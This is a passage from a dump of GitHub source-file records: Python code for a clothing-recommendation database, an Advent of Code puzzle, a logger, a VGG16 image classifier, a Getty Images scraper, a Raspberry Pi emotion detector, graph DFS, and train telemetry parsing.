viewCnt\n if cat in col_list:\n user[cat] /= user['viewCnt']\n db.user_ssafit.update_one({'userId': int(userId), 'largecategory': largecategory}, {'$set': {'viewCnt': user['viewCnt'], cat: user[cat]}})\n \n # 좋아요 취소\n elif num == 2:\n for idx, cat in enumerate(user):\n # 모든 성분 * viewCnt\n if cat in col_list:\n user[cat] *= user['viewCnt']\n if cat == smallCategorySelect and user[cat] >= 1:\n user[cat] -= 1\n elif cat == colorSelect and user[cat] >= 1:\n user[cat] -= 1\n elif cat in style and user[cat]:\n user[cat] -= cloth[cat]\n if user[cat] < 0:\n user[cat] = 0\n db.user_ssafit.update_one({'userId': int(userId), 'largecategory': largecategory}, {'$set': {'viewCnt': user['viewCnt'], cat: user[cat]}})\n\n user['viewCnt'] -= 1\n if user['viewCnt'] == 0:\n for idx, cat in enumerate(user):\n if cat in col_list:\n user[cat] = 0\n db.user_ssafit.update_one({'userId': int(userId), 'largecategory': largecategory}, {'$set': {'viewCnt': user['viewCnt'], cat: user[cat]}})\n else:\n for idx, cat in enumerate(user):\n # 모든 성분 / viewCnt\n if cat in col_list:\n user[cat] /= user['viewCnt']\n db.user_ssafit.update_one({'userId': int(userId), 'largecategory': largecategory}, {'$set': {'viewCnt': user['viewCnt'], cat: user[cat]}})\n return\n\n\ndef get_recent_items(userId):\n user = db.user_ssafit.find_one({'userId':int(userId), 'largecategory': 1}, {'_id': 0})\n try:\n clothes = []\n result = user['recentItems']\n for cloth_id in result:\n cloth = db.cloth.find_one({'newClothId': cloth_id}, {'_id': 0})\n clothes.append(cloth_helper(cloth))\n return clothes\n except:\n return []\n\n\ndef change_recent_item(userId, newClothId):\n cloth = get_cloth(newClothId)\n user = db.user_ssafit.find_one({'userId': int(userId), 'largecategory': 1}, {'_id': 0})\n try:\n if newClothId in user['recentItems']:\n user['recentItems'].remove(newClothId)\n user['recentItems'].insert(0, newClothId)\n elif newClothId not in user['recentItems'] and len(user['recentItems']) < 5:\n user['recentItems'].insert(0, newClothId)\n elif newClothId not in user['recentItems'] and len(user['recentItems']) == 5:\n user['recentItems'].pop()\n user['recentItems'].insert(0, newClothId)\n db.user_ssafit.update_one({'userId': int(userId), 'largecategory': 1}, {'$set': {'recentItems': user['recentItems']}})\n\n except:\n db.user_ssafit.update_one({'userId': int(userId), 'largecategory': 1}, {'$set': {'recentItems': list()}})\n users = db.user_ssafit.find_one({'userId': int(userId), 'largecategory': 1}, {'_id': 0})\n users['recentItems'].append(newClothId)\n db.user_ssafit.update_one({'userId': int(userId), 'largecategory': 1}, {'$set': {'recentItems': users['recentItems']}})\n return\n\ndef change_img():\n a = \"//image.msscdn.net/images/goods_img/20210127/1765993/1765993_2_500.jpg\"\n b = \"//image.msscdn.net/images/goods_img/20210127/1765993/1765993_3_500.jpg\"\n clothes = db.cloth.find({'clothImg': a})\n for cloth in clothes:\n db.cloth.update_one({'clothImg': a}, {'$set': {'clothImg': b}})","repo_name":"yoonjung1205/SSAFit","sub_path":"data/app/database/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":19592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"35335676689","text":"# https://adventofcode.com/2021/day/6\n\ndef parse(raw):\n days = [0] * 9\n for x in map(int, raw.split(',')):\n days[x] += 1\n return days\n\ndef step(days):\n days.append( days.pop(0) )\n days[6] += days[-1]\n return days\n\ndef exp(days, n=80):\n days = days[:]\n for _ in range(n):\n 
days = step(days)\n return sum(days)\n\nTEST = '3,4,3,1,2'\n\nif __name__ == '__main__':\n assert exp(parse(TEST)) == 5934\n assert exp(parse(TEST), 256) == 26984457539\n\n days = parse(open('data/day06.in').read())\n print(exp(days), exp(days, 256))","repo_name":"andy1li/adventofcode","sub_path":"2021/day06_exp.py","file_name":"day06_exp.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"73249687130","text":"\"\"\"\nSimple Logging system for Python.\n\n- `logger.log(log, opt: path, opt: log_format)` - meant to be used for loggin info to the log file.\n- `logger.warning(log, opt: path, opt: log_format)` - meant to be used for logging any warnings to the log file.\n- `logger.error(log, opt: path, opt: log_format)` - meant to be used for logging any errors to the log file.\n- `logger.debug(log, opt:path, opt: log_format)` - meant to be used for logging any debug info to the log file.\n- `logger.mkfile(opt: path, opt: log_format)` - meant to be used to create the log file if it doesn't exist.\n\nExample Usage:\n```python\nimport logger\n\ndef foo(x):\n ...\n\ntry:\n foo(x)\nexcept Exception as e:\n logger.error(e)\n\"\"\"\n\nimport time\nimport os\n\nfrom typing import Union\n\n\ndef mkfile(path: str = \"logs\", log_format: str = \"%Y-%m-%d\"):\n \"\"\"\n Creates the log directory and the log file if it doesn't exist.\n \"\"\"\n if not os.path.exists(path):\n os.mkdir(path)\n\n if not os.path.exists(f\"{path}/{time.strftime(log_format)}.txt\"):\n os.mknod(f\"{path}/{time.strftime(log_format)}.txt\")\n\n\ndef log(log: Union[str, Exception], path: str = \"logs\", log_format: str = \"%Y-%m-%d\"):\n \"\"\"\n Use this function to show LOG information.\n \"\"\"\n mkfile(path)\n\n with open(f\"{path}/{time.strftime(log_format)}.txt\", \"a\") as f:\n f.write(f'{time.strftime(\"LOG %H:%M:%S\")} {log}\\n')\n\n\ndef warning(\n log: Union[str, Exception], path: str = \"logs\", log_format: str = \"%Y-%m-%d\"\n):\n \"\"\"\n Use this function to show WARNING information.\n \"\"\"\n mkfile(path)\n\n with open(f\"{path}/{time.strftime(log_format)}.txt\", \"a\") as f:\n f.write(f'{time.strftime(\"WARNING %H:%M:%S\")} {log}\\n')\n\n\ndef error(log: Union[str, Exception], path: str = \"logs\"):\n \"\"\"\n Use this function to show ERROR information.\n \"\"\"\n mkfile(path)\n\n with open(f'{path}/{time.strftime(\"%Y-%m-%d\")}.txt', \"a\") as f:\n f.write(f'{time.strftime(\"ERROR %H:%M:%S\")} {log}\\n')\n\n\ndef debug(log: Union[str, Exception], path: str = \"logs\", log_format: str = \"%Y-%m-%d\"):\n \"\"\"\n Use this function to show DEBUG information.\n \"\"\"\n mkfile(path)\n\n with open(f\"{path}/{time.strftime(log_format)}.txt\", \"a\") as f:\n f.write(f'{time.strftime(\"DEBUG %H:%M:%S\")} {log}\\n')\n","repo_name":"KotonBads/todo-list","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37366728821","text":"import tensorflow as tf\nimport numpy as np\nfrom keras.preprocessing.image import ImageDataGenerator, img_to_array, load_img\nfrom keras.models import Sequential\nfrom keras import optimizers\nfrom keras.layers import Dropout, Flatten, Dense\nfrom keras import applications\nfrom keras.utils.np_utils import to_categorical\nimport matplotlib.pyplot as plt\nimport math\nimport cv2\nimport os\nimport sys\nimport json\nimport requests\n#import pygame\n#from 
keras.models import \n\n\n#gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.95, allow_growth=True) \n#sess = tf.Session(config=tf.ConfigProto(log_device_placement=True, allow_soft_placement=True, gpu_options=gpu_options))\n\n\n# dimensions of our images.\nimg_width, img_height = 224, 224\ntop_model_weights_path = 'bottleneck_fc_model.h5'\ntrain_data_dir = 'data/train/'\nvalidation_data_dir = 'data/validation/'\n\n# number of epochs to train top model\nepochs = 10\n# batch size used by flow_from_directory and predict_generator\nbatch_size = 3\n\n\ndef save_bottlebeck_features():\n # build the VGG16 network\n model = applications.VGG16(include_top=False, weights='imagenet')\n print(model.summary())\n\n datagen = ImageDataGenerator(rescale=1. / 255)\n\n generator = datagen.flow_from_directory(\n train_data_dir,\n target_size=(img_width, img_height),\n batch_size=batch_size,\n class_mode=None,\n shuffle=False)\n\n #print(len(generator.filenames))\n #print(generator.class_indices)\n #print(len(generator.class_indices))\n\n nb_train_samples = len(generator.filenames)\n num_classes = len(generator.class_indices)\n\n predict_size_train = int(math.ceil(nb_train_samples / batch_size))\n\n bottleneck_features_train = model.predict_generator(\n generator, predict_size_train)\n\n np.save('bottleneck_features_train.npy', bottleneck_features_train)\n\n generator = datagen.flow_from_directory(\n validation_data_dir,\n target_size=(img_width, img_height),\n batch_size=batch_size,\n class_mode=None,\n shuffle=False)\n\n nb_validation_samples = len(generator.filenames)\n\n predict_size_validation = int(\n math.ceil(nb_validation_samples / batch_size))\n\n bottleneck_features_validation = model.predict_generator(\n generator, predict_size_validation)\n\n np.save('bottleneck_features_validation.npy',\n bottleneck_features_validation)\n\n\ndef train_top_model():\n datagen_top = ImageDataGenerator(rescale=1. 
/ 255)\n generator_top = datagen_top.flow_from_directory(\n train_data_dir,\n target_size=(img_width, img_height),\n batch_size=batch_size,\n class_mode='categorical',\n shuffle=False)\n\n nb_train_samples = len(generator_top.filenames)\n num_classes = len(generator_top.class_indices)\n\n # save the class indices to use use later in predictions\n np.save('class_indices.npy', generator_top.class_indices)\n\n # load the bottleneck features saved earlier\n train_data = np.load('bottleneck_features_train.npy')\n\n # get the class lebels for the training data, in the original order\n train_labels = generator_top.classes\n\n # https://github.com/fchollet/keras/issues/3467\n # convert the training labels to categorical vectors\n train_labels = to_categorical(train_labels, num_classes=num_classes)\n\n generator_top = datagen_top.flow_from_directory(\n validation_data_dir,\n target_size=(img_width, img_height),\n batch_size=batch_size,\n class_mode='categorical',\n shuffle=False)\n\n nb_validation_samples = len(generator_top.filenames)\n\n validation_data = np.load('bottleneck_features_validation.npy')\n\n validation_labels = generator_top.classes\n validation_labels = to_categorical(\n validation_labels, num_classes=num_classes)\n\n model = Sequential()\n model.add(Flatten(input_shape=train_data.shape[1:]))\n\n# model.add(Flatten(input_shape=(224,224,3)))\n model.add(Dense(256, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(num_classes, activation='softmax'))\n\n model.compile(optimizer=optimizers.Adam(lr=0.0001),\n loss='categorical_crossentropy', metrics=['accuracy'])\n\n history = model.fit(train_data, train_labels,\n epochs=epochs,\n batch_size=batch_size,\n validation_data=(validation_data, validation_labels))\n\n model.save_weights(top_model_weights_path)\n\n (eval_loss, eval_accuracy) = model.evaluate(\n validation_data, validation_labels, batch_size=batch_size, verbose=1)\n \n\n print(\"[INFO] accuracy: {:.2f}%\".format(eval_accuracy * 100))\n print(\"[INFO] Loss: {}\".format(eval_loss))\n \n \n\n\n plt.figure(1)\n\n # summarize history for accuracy\n\n plt.subplot(211)\n plt.plot(history.history['acc'])\n plt.plot(history.history['val_acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n\n # summarize history for loss\n\n plt.subplot(212)\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.show()\n\n\n \n \n\ndef predict(image_path, asset_id):\n # load the class_indices saved in the earlier step\n class_dictionary = np.load('class_indices.npy').item()\n\n num_classes = len(class_dictionary)\n\n \n# orig = cv2.imread(image_path, 1)\n# cv2.imshow(\"Actual\", orig)\n# cv2.waitKey(1000)\n\n print(\"[INFO] loading and preprocessing image...\")\n image = load_img(image_path, target_size=(224, 224))\n image = img_to_array(image)\n\n # important! 
otherwise the predictions will be '0'\n    image = image / 255\n\n    image = np.expand_dims(image, axis=0)\n\n    # build the VGG16 network\n    model = applications.VGG16(include_top=False, weights='imagenet')\n\n    # get the bottleneck prediction from the pre-trained VGG16 model\n    bottleneck_prediction = model.predict(image)\n\n    # build top model\n    model = Sequential()\n    model.add(Flatten(input_shape=bottleneck_prediction.shape[1:]))\n#    model.add(Flatten(input_shape=(224,224,3)))\n    model.add(Dense(256, activation='relu'))\n    model.add(Dropout(0.5))\n    model.add(Dense(num_classes, activation='softmax'))\n\n    model.load_weights(top_model_weights_path)\n\n    # use the bottleneck prediction on the top model to get the final\n    # classification\n    class_predicted = model.predict_classes(bottleneck_prediction)\n\n    probabilities = model.predict_proba(bottleneck_prediction)\n\n    inID = class_predicted[0]\n\n    inv_map = {v: k for k, v in class_dictionary.items()}\n\n    label = inv_map[inID]\n\n    #request to pega\n    url = 'http://192.168.2.124:8080/prweb/PRHTTPService/AIServicePackage/Services/ProcessData'\n    payload = json.dumps({"asset_id" : asset_id, "prediction" : label});\n    print(payload)\n    #headers = {'content-type': 'application/json'}\n    #response = requests.post(url, data=payload, headers=headers)\n\n\n    #display the predictions with the image\n#    out = cv2.imread(image_path, 1)\n\n#    cv2.putText(out, "Predicted: {}".format(label), (10, 30),\n#                cv2.FONT_HERSHEY_PLAIN, 1.5, (43, 99, 255), 2)\n\n\n\n#    cv2.imshow("Prediction", out)\n#    cv2.moveWindow("Prediction", 700, 0)\n#    cv2.waitKey(1000)\n#    cv2.destroyAllWindows()\n\n\n\n\ndef pred_util():\n\n    walk_dir = "./data/test/"\n\n    print('walk_dir = ' + walk_dir)\n\n    print('walk_dir (absolute) = ' + os.path.abspath(walk_dir))\n\n    for root, subdirs, files in os.walk(walk_dir):\n        asset_id = os.path.basename(root);\n        if (asset_id[:4]!="pega"):\n            continue\n        print('--\\nroot = ' + asset_id)\n\n\n        for filename in files:\n            file_path = os.path.join(root, filename)\n            predict(file_path, asset_id)\n\n            print('\\t- file %s (full path: %s)' % (filename, file_path))\n\n\n\n\nsave_bottlebeck_features()\ntrain_top_model()\npred_util()\n# cv2.destroyAllWindows()\n\n\n\n\n\n\n","repo_name":"ajaysh2193/Driver-Posture-and-Activity-Recognition","sub_path":"poc.py","file_name":"poc.py","file_ext":"py","file_size_in_byte":8134,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"27215177138","text":"# importing the required module\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# x axis values\nxs = np.array([])\n# corresponding y axis values\nys = []\n\n\ndef apply(num):\n    if (num % 2 == 0):\n        return num // 2\n    else:\n        return num * 3 + 1\n\n\nfor y in range(1, 1000):\n    counter = 0\n    start = y\n    while (start != 1):\n        start = apply(start)\n        print(start)\n        # grow the counts list on demand so indexing by the current value cannot fail\n        while len(ys) <= int(start):\n            ys.append(0)\n        ys[int(start)] += 1\n        counter += 1\n    if (y % 100 == 0):\n        print(y, counter)\n\n\n# plotting the points\nprint(xs)\nprint(ys)\nplt.plot(ys)\n\n# naming the x axis\nplt.xlabel('x - axis')\n# naming the y axis\nplt.ylabel('y - axis')\n\n# giving a title to my graph\nplt.title('title')\n\n# function to show the plot\nplt.show()\n","repo_name":"mishimastar/w2wsolver","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17501441881","text":"# Reformat CSV files from a folder\n# and create a new combined CSV\n\nimport os, 
re, codecs, subprocess\n\nfrom modules.file_system_functions import *\n\n\ndef run():\n    print('Start')\n\n    dir_path = 'c:/all'\n    res_file_path = 'c:/00_ALL.csv'\n    uuid_path = 'c:/uuids.txt'\n\n    res_file = codecs.open(res_file_path, encoding='utf-8', mode='w')\n    uuid_file = codecs.open(uuid_path, encoding='utf-8', mode='w')\n\n    files_list = get_filepaths(dir_path)\n    res_file.write('path;uuid\\n')\n\n    total_lines = 0\n    for fp in files_list:\n        f = codecs.open(fp, encoding='utf-8', mode='r')\n        for line in f:\n            if line[0] != '\\t':\n                parts = line.split(';')\n\n                num_lines = int((len(parts)-1) / 3)\n                total_lines += num_lines\n\n                doc_item = []\n                for part in parts:\n                    if len(doc_item) == 3:\n                        doc_item[2] = doc_item[2].replace('/ROOT_PATH/', '')\n                        doc = doc_item[2] + '/' + doc_item[0] + ';' + doc_item[1] + '\\n'\n                        res_file.write(doc)\n\n                        uuid_file.write(doc_item[1] + '\\n')\n                        doc_item = []\n\n                    part = part.strip()\n                    if len(part) != 0:\n                        doc_item.append(part)\n\n        f.close()\n\n    res_file.close()\n\n    print('Finish, Total lines: ' + str(total_lines))\n\n\nrun()\n","repo_name":"mortalis13/PythonScripts","sub_path":"process_csv.py","file_name":"process_csv.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14513806827","text":"import requests\nimport numpy as np\nimport csv\nimport random\nimport os\nimport time\n\nfrom datetime import datetime\nfrom fake_useragent import UserAgent\nfrom tqdm import tqdm\nfrom bs4 import BeautifulSoup\n\nfrom .scrapping_utils import ScrappingUtils\n\nclass GettyImagesScrapper(ScrappingUtils):\n\n    def __init__(self, num_pages, queries) -> None:\n        super().__init__()\n        self.num_pages = num_pages\n        self.queries = queries\n\n    def query_request(self, base_url, i):\n        ua = UserAgent()\n        headers = {'User-Agent':ua.random}\n        succes_response = False\n        while not succes_response:\n            proxies = self.get_random_proxy()\n            print("Trying with proxies: {}".format(proxies))\n            try:\n                response = requests.get(base_url + '?page={0}'.format(i), headers=headers, proxies=proxies)\n                if response.status_code == 200:\n                    succes_response = True\n            except Exception:\n                # back off for a few seconds before retrying with another proxy\n                time.sleep(random.randint(2, 10))\n        return response\n\n    def image_detail_request(self, detail_url):\n        ua = UserAgent()\n        headers = {'User-Agent':ua.random}\n        succes_response = False\n        while not succes_response:\n            proxies = self.get_random_proxy()\n            print("Trying with proxies: {}".format(proxies))\n            try:\n                response = requests.get(detail_url, headers=headers, proxies=proxies)\n                if response.status_code == 200:\n                    succes_response = True\n            except Exception:\n                # back off for a few seconds before retrying with another proxy\n                time.sleep(random.randint(2, 10))\n        return response\n\n    def parse_image_detail_html_data(self, response):\n        soup = BeautifulSoup(response.content, "html.parser")\n        caption_div_elem = soup.find("div", {"data-testid":"caption"})\n\n        if caption_div_elem:\n            return caption_div_elem.contents\n\n    def download_image(self, url):\n        path = "data/imgs/gettyimages/"\n        ppid = os.getpid()\n        timestamp = datetime.now().timestamp()\n        response = requests.get(url)\n        if response.status_code == 200:\n            if not os.path.exists(path): os.mkdir(path)\n            filename = "{}-{}.jpg".format(timestamp, ppid)\n            with open(path + filename , 'wb') as f:\n                f.write(response.content)\n            return path+filename\n        return None\n\n    def parse_query_html_data(self, response):\n        results = []\n        soup = BeautifulSoup(response.content, "html.parser")\n\n        img_divs = soup.find_all("div", {"data-testid": "galleryMosaicAsset"})\n\n        for div in img_divs:\n            img_url = None\n
local_path = None\n title = None\n caption = None\n\n # URL\n img_elem = div.find(\"img\", {\"class\": \"BLA_wBUJrga_SkfJ8won\"})\n if img_elem:\n img_url = img_elem[\"src\"]\n local_path = self.download_image(img_url)\n title = img_elem[\"alt\"]\n\n detail_url_elem = div.find(\"a\", {\"class\": \"TV1lZmIBFh_LgfiQqK1O\"})\n if detail_url_elem:\n # Caption\n detail_url = 'https://www.gettyimages.es' + detail_url_elem['href']\n print(detail_url)\n response = self.image_detail_request(detail_url)\n caption = self.parse_image_detail_html_data(response)\n\n results.append([img_url, local_path, title, caption])\n\n return results\n \n def result_to_csv(self, results_list, path, query):\n if not os.path.exists(path): \n os.mkdir(path)\n filename = \"gettyimages_\" + query.replace(\" \", \"_\") + \".csv\"\n with open(path+filename, \"w\", encoding=\"utf-8\", newline='') as file:\n writer = csv.writer(file)\n writer.writerow([\"img_url\", \"local_path\", \"title\", \"caption\"])\n writer.writerows(results_list)\n\n def scrap(self):\n for query in self.queries:\n print(\"Starting query: {}\".format(query))\n search_query = query.replace(' ', '-')\n gettyimagge_base_url = 'https://www.gettyimages.es/fotos/{0}'.format(search_query)\n \n final_results_list = []\n for i in tqdm(range(1, self.num_pages+1)):\n response = self.query_request(gettyimagge_base_url, i)\n results = self.parse_query_html_data(response)\n\n if len(final_results_list) == 0:\n final_results_list = results\n else:\n final_results_list = np.concatenate((results, final_results_list), axis=0)\n \n print(\"{} images scrapped\".format(len(final_results_list)))\n\n if len(final_results_list) > 0:\n path = \"./data/captions/raw/\"\n self.result_to_csv(final_results_list, path, query)\n","repo_name":"TheMrguiller/MUCSI_Modal","sub_path":"src/scrappers/gettyimages_scrapper.py","file_name":"gettyimages_scrapper.py","file_ext":"py","file_size_in_byte":4852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10430354723","text":"from fer import FER\nimport cv2\nimport pprint\nfrom picamera import PiCamera\nfrom PIL import Image\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef convertToRGB(image):\n return cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\ndef init_cam():\n #sets up Picam, can be altered for normal webcam\n camera = PiCamera()\n camera.resolution = (1024, 768)\n print('Camera initialized')\n return camera\n\ndef get_emotion(camera):\n \n result=[]\n faces_rects=[]\n ##repeatedly takes photos and checks each for valid face with expression, can change later for more specificity in selection\n while not np.any(faces_rects):\n camera.capture(\"/home/pi/fer-21.0.5/tests/sample.jpg\")\n image = cv2.imread(\"/home/pi/fer-21.0.5/tests/sample.jpg\")\n test_image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n haar_cascade_face = cv2.CascadeClassifier('/home/pi/opencv/data/haarcascades/haarcascade_frontalface_alt2.xml')\n faces_rects = haar_cascade_face.detectMultiScale(test_image_gray, scaleFactor = 1.2, minNeighbors = 5);\n print('Faces found: ', len(faces_rects))\n #Remainder of code only necessary for visual display of info, if the program only needs to know emotions internally, program can stop here\n for (x,y,w,h) in faces_rects:\n cv2.rectangle(image, (x, y), (x+w, y+h), (0, 255, 0), 2)\n plt.imshow(convertToRGB(image))\n detector = FER()\n result = detector.detect_emotions(image)\n result2 = detector.top_emotion(image)\n bounding_box = result[0][\"box\"]\n 
emotions = result[0][\"emotions\"]\n \n print('got image')\n \n cv2.rectangle(\n image,\n (bounding_box[0], bounding_box[1]),\n (bounding_box[0] + bounding_box[2], bounding_box[1] + bounding_box[3]),\n (0, 155, 255),\n 2,\n )\n\n for idx, (emotion, score) in enumerate(emotions.items()):\n color = (211, 211, 211) if score < 0.01 else (0, 255, 0)\n emotion_score = \"{}: {}\".format(\n emotion, \"{:.2f}\".format(score) if score > 0.01 else \"\")\n cv2.putText(\n image,\n emotion_score,\n (bounding_box[0], bounding_box[1] + bounding_box[3] + 30 + idx * 15),\n cv2.FONT_HERSHEY_SIMPLEX,\n 0.5,\n color,\n 1,\n cv2.LINE_AA,\n )\n cv2.imwrite(\"/home/pi/fer-21.0.5/tests/sample.jpg\", image)\n\n img=Image.open(\"/home/pi/fer-21.0.5/tests/sample.jpg\")\n #img.show() #use for testing purposes, displays imgage w box\n #delete \"user data\" at end of execution\n os.remove(\"/home/pi/fer-21.0.5/tests/sample.jpg\")\n \n return result2\n\nif __name__ == '__main__':\n camera = init_cam()\n for i in range(3):\n print(get_emotion(camera))\n camera.close()\n\n","repo_name":"John-priv/student_sentiment_sensor","sub_path":"backend/cv.py","file_name":"cv.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"3891650588","text":"class Graph:\n def __init__(self, noOfVertex):\n self.v = noOfVertex\n self.graph = [[] for i in range(self.v) ]\n\n def addEdge(self, frm, to):\n self.graph[frm].append(to)\n\n #For undirected\n self.graph[to].append(frm)\n\n def printGraph(self):\n for i in self.graph:\n print(i)\n\n def dfsOfGraph(self):\n visited = [ False for i in range(self.v) ]\n stk = list()\n dfsans = []\n\n stk.append(0)\n \n self.mydfs(visited, stk, dfsans)\n return dfsans\n \n def mydfs(self, visited, stk, dfsans):\n temp = stk.pop()\n visited[temp] = True\n dfsans.append(temp)\n \n for i in self.graph[temp]:\n if visited[i] is False:\n visited[i] = True\n stk.append(i)\n self.mydfs(visited, stk, dfsans)\n\n\nmyGraph = Graph(5)\n\nmyGraph.addEdge(0,3)\nmyGraph.addEdge(1,3)\nmyGraph.addEdge(2,3)\nmyGraph.addEdge(4,3)\nmyGraph.addEdge(1,4)\nmyGraph.addEdge(2,4) \n\n#myGraph.printGraph()\n\nprint(myGraph.dfsOfGraph())","repo_name":"safibadi/DSA","sub_path":"Graph/Adj List/DFS_Adj_list.py","file_name":"DFS_Adj_list.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74860872412","text":"from functions import *\nfrom Variables import *\nimport Raw_data_processing\n\n\ndef mobileDefectOcc_compute(period, ID, M_treated_occ):\n occ = 0\n i = 1\n for mess in M_treated_occ:\n gps_field = mess.decode_GPS()\n obu_date = dateStringToIntConvert(gps_field[GPS_DATE])\n obu_data = mess.OBU_DATA\n obu_id = mess.OBU_ID\n obu_time = gps_field[GPS_TIME]\n obu_time = int(obu_time[0:6])\n if((dateStringToIntConvert(period[0]) <= obu_date < dateStringToIntConvert(period[1])) and (obu_id == ID) and (mess.double_check == 0)):\n occ = occ + 1\n return occ\n\ndef mobileDefectTotalOcc_compute(period, ID, M_treated_occTotal):\n occ = 0\n i = 1\n for mess in M_treated_occTotal:\n gps_field = mess.decode_GPS()\n obu_date = dateStringToIntConvert(gps_field[GPS_DATE])\n obu_data = mess.OBU_DATA\n obu_id = mess.OBU_ID\n obu_time = gps_field[GPS_TIME]\n obu_time = int(obu_time[0:6])\n if((dateStringToIntConvert(period[0]) <= obu_date < dateStringToIntConvert(period[1])) and (obu_id == ID) and (mess.double_check == 0)):\n occ = occ + 1\n return 
occ\n\n \ndef trainOpTime_compute(period, ID, M_treated_tot):\n tuples = []\n for mess in M_treated_tot:\n gps_field = mess.decode_GPS()\n obu_date = dateStringToIntConvert(gps_field[GPS_DATE])\n obu_data = mess.OBU_DATA\n obu_id = mess.OBU_ID\n obu_time = gps_field[GPS_TIME]\n obu_time = int(obu_time[0:6])\n if((dateStringToIntConvert(period[0]) <= obu_date < dateStringToIntConvert(period[1])) and (obu_id == ID)):\n index = findIndexof(mess.OBU_DATA, ',', 17)\n TRAIN_OP_TIME = int(obu_data[(index[0]+1):(index[1])])\n tuples.append((TRAIN_OP_TIME,obu_date,obu_time))\n tuples_sorted = sorted(tuples, key = lambda x: (x[1],x[2]))\n i = 0\n TOT = []\n for t in tuples_sorted:\n print(t[0],t[1],t[2])\n TOT.append(t[0])\n i = i + 1\n offset = 0\n for i in range(0,len(TOT)-1):\n #print(TOT[i])\n if((TOT[i+1] < TOT[i]) and ((TOT[i]-TOT[i+1]) > 10)):\n #print('cc')\n offset = TOT[i]\n index = i\n print('Reset comet or anomaly (TOT): '+str(tuples_sorted[index]))\n break\n if(offset > 0):\n for i in range(index+1,len(TOT)):\n TOT[i] = TOT[i] + offset\n #print(TOT[i])\n '''for i in TOT:\n print(i)'''\n if(len(TOT) == 0):\n return 0\n else:\n return (max(TOT)-min(TOT))\n\n\n\ndef kmODO_compute(period, ID, M_treated_tot):\n tuples = []\n for mess in M_treated_tot:\n gps_field = mess.decode_GPS()\n obu_date = dateStringToIntConvert(gps_field[GPS_DATE])\n obu_data = mess.OBU_DATA\n obu_id = mess.OBU_ID\n obu_time = gps_field[GPS_TIME]\n obu_time = int(obu_time[0:6])\n if((dateStringToIntConvert(period[0]) <= obu_date < dateStringToIntConvert(period[1])) and (obu_id == ID)):\n index = findIndexof(mess.OBU_DATA, ',', 17)\n km_odo = int(obu_data[(index[7]+1):(index[8])])\n km_gps = int(obu_data[(index[6]+1):(index[7])])\n tuples.append((km_odo,km_gps,obu_date,obu_time))\n tuples_sorted = sorted(tuples, key = lambda x: (x[2],x[3]))\n i = 0\n KM_ODO = []\n for t in tuples_sorted:\n print(i,t[0],t[1],t[2])\n KM_ODO.append(t[0])\n i = i + 1\n offset = 0\n for i in range(0,len(KM_ODO)-1):\n #print(KM_ODO[i])\n if((KM_ODO[i+1] < KM_ODO[i])):\n #print('cc')\n offset = KM_ODO[i]\n index = i\n print('======= '+str(index))\n print('Reset comet or anomaly (ODO): '+str(tuples_sorted[index]))\n break\n if(offset > 0):\n for i in range(index+1,len(KM_ODO)):\n KM_ODO[i] = KM_ODO[i] + offset\n #print(KM_ODO[i])\n '''for i in TOT:\n print(i)'''\n if(len(KM_ODO) == 0):\n return 0\n else:\n return (KM_ODO[len(KM_ODO)-1]-KM_ODO[0])\n\n\n\n\ndef kmODO_trainOpTime_compute(period, ID, M_treated_tot):\n tuples_odo = []\n tuples_tot = []\n km_final = 0\n tot_final = 0\n comet_init_odo = []\n comet_init_tot = []\n COMET_FLAG_ODO = 0\n COMET_FLAG_TOT = 0\n for mess in M_treated_tot:\n gps_field = mess.decode_GPS()\n obu_date = dateStringToIntConvert(gps_field[GPS_DATE])\n obu_data = mess.OBU_DATA\n obu_id = mess.OBU_ID\n obu_time = gps_field[GPS_TIME]\n obu_time = int(obu_time[0:6])\n if((dateStringToIntConvert(period[0]) <= obu_date < dateStringToIntConvert(period[1])) and (obu_id == ID)):\n index = findIndexof(mess.OBU_DATA, ',', 17)\n tot = int(obu_data[(index[0]+1):(index[1])])\n km_odo = int(obu_data[(index[7]+1):(index[8])])\n tuples_tot.append((tot,obu_date,obu_time))\n tuples_odo.append((km_odo,obu_date,obu_time))\n tuples_odo_sorted = sorted(tuples_odo, key = lambda x: (x[1],x[2]))\n tuples_tot_sorted = sorted(tuples_tot, key = lambda x: (x[1],x[2]))\n i = 0\n TOT = []\n KM_ODO = []\n Date_odo = []\n Date_tot = []\n for k in range(0,len(tuples_odo_sorted)):\n t_odo = tuples_odo_sorted[k]\n t_tot = tuples_tot_sorted[k]\n 
